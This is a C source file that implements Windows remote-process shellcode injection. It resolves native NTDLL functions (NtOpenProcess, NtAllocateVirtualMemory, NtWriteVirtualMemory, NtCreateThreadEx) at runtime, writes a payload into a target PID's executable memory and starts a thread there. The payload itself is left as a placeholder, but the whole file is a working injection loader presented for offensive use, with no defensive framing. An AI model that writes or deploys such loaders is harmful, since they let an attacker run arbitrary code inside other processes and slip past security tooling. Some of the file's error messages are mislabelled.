native.c

#include <windows.h>
#include <stdio.h>

#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // this is the success code.
// For debugging
#define okay(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
#define info(msg, ...) printf("[i] " msg "\n", ##__VA_ARGS__)
#define warn(msg, ...) printf("[-] " msg "\n", ##__VA_ARGS__)

/* Function Prototypes */

// We need to structure the functions that are not structured, such as POBJECT_ATTRIBUTES and PCLIENT_ID, we get this from VERGILIUS
//0x30 bytes (sizeof)
typedef struct _OBJECT_ATTRIBUTES
{
	ULONG Length;                                                           //0x0
	VOID* RootDirectory;                                                    //0x8
	struct _UNICODE_STRING* ObjectName;                                     //0x10
	ULONG Attributes;                                                       //0x18
	VOID* SecurityDescriptor;                                               //0x20
	VOID* SecurityQualityOfService;                                         //0x28
}OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

//0x10 bytes (sizeof)
typedef struct _CLIENT_ID
{
	VOID* UniqueProcess;                                                    //0x0
	VOID* UniqueThread;                                                     //0x8
} CLIENT_ID, *PCLIENT_ID ;


// OpenProcess
typedef NTSTATUS(NTAPI* NtOpenProcess)(
	_Out_ PHANDLE ProcessHandle,
	_In_ ACCESS_MASK DesiredAccess,
	_In_ POBJECT_ATTRIBUTES ObjectAttributes,
	_In_opt_ PCLIENT_ID ClientId
	);

typedef NTSTATUS(NTAPI* NtClose)(
	_In_ _Post_ptr_invalid_ HANDLE Handle
	);


typedef struct _PS_ATTRIBUTE
{
	ULONG_PTR Attribute;
	SIZE_T Size;
	union
	{
		ULONG_PTR Value;
		PVOID ValuePtr;
	};
	PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef const OBJECT_ATTRIBUTES* PCOBJECT_ATTRIBUTES;

typedef struct _PS_ATTRIBUTE_LIST
{
	SIZE_T TotalLength;
	PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

// CreateRemoteThread
typedef NTSTATUS(NTAPI* NtCreateThreadEx)(
	_Out_ PHANDLE ThreadHandle,
	_In_ ACCESS_MASK DesiredAccess,
	_In_opt_ PCOBJECT_ATTRIBUTES ObjectAttributes,
	_In_ HANDLE ProcessHandle,
	_In_ PVOID StartRoutine,
	_In_opt_ PVOID Argument,
	_In_ ULONG CreateFlags, // THREAD_CREATE_FLAGS_*
	_In_ SIZE_T ZeroBits,
	_In_ SIZE_T StackSize,
	_In_ SIZE_T MaximumStackSize,
	_In_opt_ PPS_ATTRIBUTE_LIST AttributeList
	);

// VirtualAlloc
typedef NTSTATUS(NTAPI* NtAllocateVirtualMemory)(
	_In_ HANDLE ProcessHandle,	// hProcess
	_Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID* BaseAddress, // &rBuffer
	_In_ ULONG_PTR ZeroBits,	// 0
	_Inout_ PSIZE_T RegionSize,	// shellcode size as a POINTER.
	_In_ ULONG AllocationType, // MEM_RESERVE | MEM_COMMIT
	_In_ ULONG PageProtection // PAGE_EXECUTE_READWRITE
	);

// WriteProcessMemory
typedef NTSTATUS(NTAPI* NtWriteVirtualMemory)(
	_In_ HANDLE ProcessHandle,
	_In_opt_ PVOID BaseAddress,
	_In_reads_bytes_(NumberOfBytesToWrite) PVOID Buffer,
	_In_ SIZE_T NumberOfBytesToWrite,
	_Out_opt_ PSIZE_T NumberOfBytesWritten
	);

HMODULE GetMod(
	IN LPCWSTR modName
)	{

		HMODULE hModule = NULL;

info("trying to get a handle to %S", modName);
hModule = GetModuleHandleW(modName);

if (hModule == NULL) {
	warn("failed to get a handle to the module, error: 0x%lx\n", GetLastError());
	return NULL;
}
else {
	okay("got a handle to the module!");
	return hModule;
}
	}

int main(int argc, char* argv[]) {
	NTSTATUS STATUS;
	DWORD PID = 0;
	PVOID rBuffer = NULL;
	HMODULE hNTDLL = NULL;
	HANDLE hThread = NULL;
	HANDLE hProcess = NULL;
	unsigned char shellcode[] = <SHELLCODE>
		

	SIZE_T shellcodesize = sizeof(shellcode);

	if (argc < 2) {
		printf("Usage: process.exe <PID>");
	}

	// For error handling
	/*
	STATUS = NtSomeFunction(Test, Test, Test);
	if (STATUS != STATUS_SUCCESS) {
		warn("[NtFunction] went wrong, error 0x%lx", STATUS);
		return EXIT_FAILURE;
	}
	*/
	PID = atoi(argv[1]);
	// Getting a handle on NTDLL
	hNTDLL = GetMod(L"NTDLL");
	NtOpenProcess kawOpen = (NtOpenProcess)GetProcAddress(hNTDLL, "NtOpenProcess");
	NtCreateThreadEx kawThread = (NtCreateThreadEx)GetProcAddress(hNTDLL, "NtCreateThreadEx");
	NtClose kawClose = (NtClose)GetProcAddress(hNTDLL, "NtClose");
	NtAllocateVirtualMemory kawVirtual = (NtAllocateVirtualMemory)GetProcAddress(hNTDLL, "NtAllocateVirtualMemory");
	NtWriteVirtualMemory kawWrite = (NtWriteVirtualMemory)GetProcAddress(hNTDLL, "NtWriteVirtualMemory");


	// OBJECT ATTRIBUTES is the size structure, so we have to initialize it.
	// ALSO CLIENT_ID holds the PID, so we have to initalize it
	OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL };
	CLIENT_ID CID = { NULL };
	CID.UniqueProcess = (HANDLE)(ULONG_PTR)PID;

	STATUS = kawOpen(&hProcess, PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, &OA, &CID); // Output is saved into hProcess.
	if (STATUS != STATUS_SUCCESS) {
		warn("[NtOpenProcess] failed to get a handle on the process, error: 0x%lx", STATUS);
		return EXIT_FAILURE;
	}
	okay("Got a handle on process %ld", PID);
	// VirtualAllocEx
	NTSTATUS nt = kawVirtual(hProcess, &rBuffer, 0, &shellcodesize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (nt != STATUS_SUCCESS) {
		warn("[NtVirtualAllocEx] failed, error: 0x%lx", nt);
		return EXIT_FAILURE;
	}
	okay("Allocated remote memory at 0x%p with size %zu", rBuffer, shellcodesize);

	// WriteProcessMemory
	STATUS = kawWrite(hProcess, rBuffer, shellcode, sizeof(shellcode), NULL);
	if (STATUS != STATUS_SUCCESS) {
		warn("[NtOpenProcess] failed to get a handle on the process, error: 0x%lx", STATUS);
		return EXIT_FAILURE;
	}

	// CreateRemoteThread
	STATUS = kawThread(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, rBuffer, NULL, 0, 0, 0, 0, NULL);
	if (STATUS != STATUS_SUCCESS) {
		warn("[NtOpenProcess] failed to get a handle on the process, error: 0x%lx", STATUS);
		return EXIT_FAILURE;
	}

	okay("thread created, waiting for thread to finish execution.");
	WaitForSingleObject(hThread, INFINITE);
	okay("thread finished execution.");

	STATUS = kawClose(hThread);
	STATUS = kawClose(hProcess);

}